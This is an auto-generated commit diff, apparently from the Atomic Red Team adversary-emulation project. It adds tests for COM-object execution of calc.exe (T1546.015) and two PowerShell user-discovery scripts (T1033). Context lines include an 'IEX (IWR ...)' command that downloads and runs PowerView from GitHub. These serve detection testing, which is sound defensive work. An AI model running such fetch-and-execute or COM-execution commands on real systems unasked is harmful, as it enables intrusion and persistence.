Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

2022-03-23 17:44:48 +00:00
parent c152203ced
commit 13200b42f9
7 changed files with 177 additions and 0 deletions
@@ -188,6 +188,7 @@ privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PR
 privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
 privilege-escalation,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
 privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
+privilege-escalation,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
 privilege-escalation,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 privilege-escalation,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 privilege-escalation,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
@@ -674,6 +675,7 @@ persistence,T1546.001,Change Default File Association,1,Change Default File Asso
 persistence,T1136.003,Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
 persistence,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
 persistence,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
+persistence,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
 persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
@@ -948,6 +950,8 @@ discovery,T1049,System Network Connections Discovery,4,System Discovery using Sh
 discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt
 discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
 discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
+discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
+discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
 discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt
 discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
 discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26-b4ce-4784f763ca20,command_prompt
@@ -130,6 +130,7 @@ privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482
 privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
 privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
+privilege-escalation,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
 privilege-escalation,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
 privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
@@ -466,6 +467,7 @@ persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce
 persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
 persistence,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
+persistence,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
 persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
@@ -647,6 +649,8 @@ discovery,T1049,System Network Connections Discovery,2,System Network Connection
 discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
 discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt
 discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
+discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
+discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
 discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt
 discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
 discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26-b4ce-4784f763ca20,command_prompt
@@ -301,6 +301,7 @@
  - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, windows, linux, macos]
 - [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
  - Atomic Test #1: COM Hijacking - InprocServer32 [windows]
+  - Atomic Test #2: Powershell Execute COM Object [windows]
 - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
  - Atomic Test #1: ListCronjobs [containers]
  - Atomic Test #2: CreateCronjob [containers]
@@ -1050,6 +1051,7 @@
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
  - Atomic Test #1: COM Hijacking - InprocServer32 [windows]
+  - Atomic Test #2: Powershell Execute COM Object [windows]
 - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
  - Atomic Test #1: ListCronjobs [containers]
@@ -1473,6 +1475,8 @@
  - Atomic Test #1: System Owner/User Discovery [windows]
  - Atomic Test #2: System Owner/User Discovery [linux, macos]
  - Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
+  - Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
+  - Atomic Test #5: GetCurrent User with PowerShell Script [windows]
 - [T1007 System Service Discovery](../../T1007/T1007.md)
  - Atomic Test #1: System Service Discovery [windows]
  - Atomic Test #2: System Service Discovery - net.exe [windows]
@@ -226,6 +226,7 @@
  - Atomic Test #1: Change Default File Association [windows]
 - [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
  - Atomic Test #1: COM Hijacking - InprocServer32 [windows]
+  - Atomic Test #2: Powershell Execute COM Object [windows]
 - [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md)
  - Atomic Test #1: Access Token Manipulation [windows]
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -755,6 +756,7 @@
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
  - Atomic Test #1: COM Hijacking - InprocServer32 [windows]
+  - Atomic Test #2: Powershell Execute COM Object [windows]
 - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1053,6 +1055,8 @@
 - [T1033 System Owner/User Discovery](../../T1033/T1033.md)
  - Atomic Test #1: System Owner/User Discovery [windows]
  - Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
+  - Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
+  - Atomic Test #5: GetCurrent User with PowerShell Script [windows]
 - [T1007 System Service Discovery](../../T1007/T1007.md)
  - Atomic Test #1: System Service Discovery [windows]
  - Atomic Test #2: System Service Discovery - net.exe [windows]
@@ -12831,6 +12831,21 @@ privilege-escalation:
        cleanup_command: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}'
          -Recurse -ErrorAction Ignore
        name: powershell
+    - name: Powershell Execute COM Object
+      auto_generated_guid: 752191b1-7c71-445c-9dbe-21bb031b18eb
+      description: Use the PowerShell to execute COM CLSID object.
+      Reference: https://pentestlab.blog/2020/05/20/persistence-com-hijacking/
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          $o= [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39"))
+          $item = $o.Item()
+          $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
+        cleanup_command: 'Get-Process -Name "*calc" | Stop-Process
+
+'
+        name: powershell
  T1053.007:
    technique:
      external_references:
@@ -44194,6 +44209,21 @@ persistence:
        cleanup_command: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}'
          -Recurse -ErrorAction Ignore
        name: powershell
+    - name: Powershell Execute COM Object
+      auto_generated_guid: 752191b1-7c71-445c-9dbe-21bb031b18eb
+      description: Use the PowerShell to execute COM CLSID object.
+      Reference: https://pentestlab.blog/2020/05/20/persistence-com-hijacking/
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          $o= [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39"))
+          $item = $o.Item()
+          $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
+        cleanup_command: 'Get-Process -Name "*calc" | Stop-Process
+
+'
+        name: powershell
  T1554:
    technique:
      created: '2020-02-11T18:18:34.279Z'
@@ -59662,6 +59692,32 @@ discovery:
          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
        name: powershell
+    - name: User Discovery With Env Vars PowerShell Script
+      auto_generated_guid: dcb6cdee-1fb0-4087-8bf8-88cfd136ba51
+      description: Use the PowerShell environment variables to identify the current
+        logged user.
+      supported_platforms:
+      - windows
+      executor:
+        command: "[System.Environment]::UserName | Out-File -FilePath .\\CurrentactiveUser.txt
+          \n$env:UserName | Out-File -FilePath .\\CurrentactiveUser.txt -Append\n"
+        cleanup_command: 'Remove-Item -Path .\CurrentactiveUser.txt -Force
+
+'
+        name: powershell
+    - name: GetCurrent User with PowerShell Script
+      auto_generated_guid: 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b
+      description: Use the PowerShell "GetCurrent" method of the WindowsIdentity .NET
+        class to identify the logged user.
+      supported_platforms:
+      - windows
+      executor:
+        command: "[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File
+          -FilePath .\\CurrentUserObject.txt\n"
+        cleanup_command: 'Remove-Item -Path .\CurrentUserObject.txt -Force
+
+'
+        name: powershell
  T1007:
    technique:
      created: '2017-05-31T21:30:21.315Z'
@@ -12,6 +12,10 @@ Utilities and commands that acquire this information include <code>whoami</code>

 - [Atomic Test #3 - Find computers where user has session - Stealth mode (PowerView)](#atomic-test-3---find-computers-where-user-has-session---stealth-mode-powerview)

+- [Atomic Test #4 - User Discovery With Env Vars PowerShell Script](#atomic-test-4---user-discovery-with-env-vars-powershell-script)
+
+- [Atomic Test #5 - GetCurrent User with PowerShell Script](#atomic-test-5---getcurrent-user-with-powershell-script)
+

 <br/>

@@ -116,4 +120,69 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29



+<br/>
+<br/>
+
+## Atomic Test #4 - User Discovery With Env Vars PowerShell Script
+Use the PowerShell environment variables to identify the current logged user.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** dcb6cdee-1fb0-4087-8bf8-88cfd136ba51
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt 
+$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path .\CurrentactiveUser.txt -Force
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - GetCurrent User with PowerShell Script
+Use the PowerShell "GetCurrent" method of the WindowsIdentity .NET class to identify the logged user.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path .\CurrentUserObject.txt -Force
+```
+
+
+
+
+
 <br/>
@@ -8,6 +8,8 @@ Adversaries can use the COM system to insert malicious code that can be executed

 - [Atomic Test #1 - COM Hijacking - InprocServer32](#atomic-test-1---com-hijacking---inprocserver32)

+- [Atomic Test #2 - Powershell Execute COM Object](#atomic-test-2---powershell-execute-com-object)
+

 <br/>

@@ -65,4 +67,38 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato



+<br/>
+<br/>
+
+## Atomic Test #2 - Powershell Execute COM Object
+Use the PowerShell to execute COM CLSID object.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 752191b1-7c71-445c-9dbe-21bb031b18eb
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$o= [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39"))
+$item = $o.Item()
+$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
+```
+
+#### Cleanup Commands:
+```powershell
+Get-Process -Name "*calc" | Stop-Process
+```
+
+
+
+
+
 <br/>